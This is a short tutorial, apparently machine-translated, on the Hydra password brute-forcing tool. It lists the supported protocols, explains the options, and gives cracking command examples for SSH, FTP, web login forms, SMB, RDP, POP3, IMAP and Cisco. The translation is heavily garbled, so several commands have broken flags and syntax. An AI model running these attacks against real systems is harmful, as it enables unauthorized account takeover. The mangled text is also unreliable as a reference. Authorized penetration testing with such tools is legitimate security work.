About 0x01
hydra is a protocol supported by many of blasting tools, integrated in kali, but can also be downloaded to run on windows;
source code on GitHub: https://github.com/vanhauser-thc/thc-hydra
Supported protocols:
adam6500、asterisk、cisco、cisco-enable、cvs、firebird、ftp、ftps、http[s]-{head|get|post}、
http[s]-{get|post}-form、http-proxy、http-proxy-urlenum、icq、imap[s]、irc、ldap2[s]、
ldap3[-{cram|digest}md5][s]、mssql、mysql、nntp、oracle-listener、oracle-sid、pcanywhere、
pcnfs、pop3[s]、postgres、radmin2、rdp、redis、rexec、rlogin、rpcap、rsh、rtsp、s7-300、sip、smb、
smtp[s]、smtp-enum、snmp、socks5、ssh、sshkey、svn、teamspeak、telnet[s]、vmauthd、vnc、xmpp
This tool can be seen blasting involved widely used.
Use 0x02
Use hdra -h parameter to view its options
Parameter Use - L specifies a single user name, known for use in blasting Username Password User Name - L specifies a plurality of user name, the file path parameter values stored in the user name - P specify a single password for the user to know the password Blasting when using the name - P specify multiple passwords, the parameter value stored password file (usually called a dictionary) path -C use this parameter when a user name and password stored in a file. Note that the file (dictionary) must be stored in the format " username: password " format. -M specify multiple targets, this parameter is stored in the target path of the file (absolute path is recommended). Note: The list of file storage format must " address: port " - the number of tasks at t specify blasting (can be understood as the number of threads), the default is 16 - S designated port for non-targeted port by default. For example: http service uses port 80. - use SSL link when blasting designated S - continue blasting on a blast from R to continue on schedule - v displays the details of blasting -f blasting a success but a stop blasting
Blasting any agreement on the choice of what protocol module
Commonly used blasting statement:
1 , crack SSH: Hydra the -l username -p password dictionary -t thread -vV - E ns ip SSH Hydra the -l username -p password dictionary -t thread save.log -o - vV ip SSH 2 , crack ftp: ip the FTP Hydra the -l username -P password dictionary -t thread (default 16) - vV Hydra ip the FTP the -l username -P password dictionary ns -e - vV 3 , submitted to get way, crack web login: Hydra the -l user Dictionary name -p password -e -t ns ip http- thread -vV GET / ADMIN / Hydra the -l username -p password dictionary ns -e -f -t thread ip http- -vV GET / ADMIN / index.php 4 submitted post way, break the web login: Hydra the -l username -P password dictionary -s 80 ip HTTP-post-form "password /admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry " Hydra -t 3 the -l ADMIN -P pass.txt -o OUT .txt -f 10.36 . 16.18 HTTP-post- form " the login.php: the uSER ID = ^ = ^ & ^ the passwd the PASS ^: <title> Wrong username or password </ title> " (parameters: -t while the number of threads 3, -l username is admin, dictionary pass. txt, saved as out.txt, -f when to crack a code to stop, 10.36 . 16 .18 target ip, http-post-form represents a break is the use of the form http password post submission crack, <title> of content is a wrong guess returns information prompt solution of). 5 , crack HTTPS: Hydra -m /index.php the -l -P pass.txt MutS 10.36 . 16.18 https 6, Crack TeamSpeak: Hydra the -l username -P password dictionary -s port number - vV ip TeamSpeak 7 , crack the Cisco: Hydra -P pass.txt 10.36 . 16.18 the Cisco Hydra -m Cloud -P pass.txt 10.36 . 16.18 Cisco- enable . 8 , cracks SMB: Hydra -l Administrator -P pass.txt 10.36 . 16.18 SMB . 9 , cracks POP3: Hydra -l MutS - P pass.txt my.pop3.mail POP3 10 , cracks RDP: Hydra IP RDP -l Administrator pass.txt -P - V 11 , cracked http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18 12、破解imap: hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
Note: number of threads blasting using ssh 4~ 7 a, since the limited number of connections ssh defined.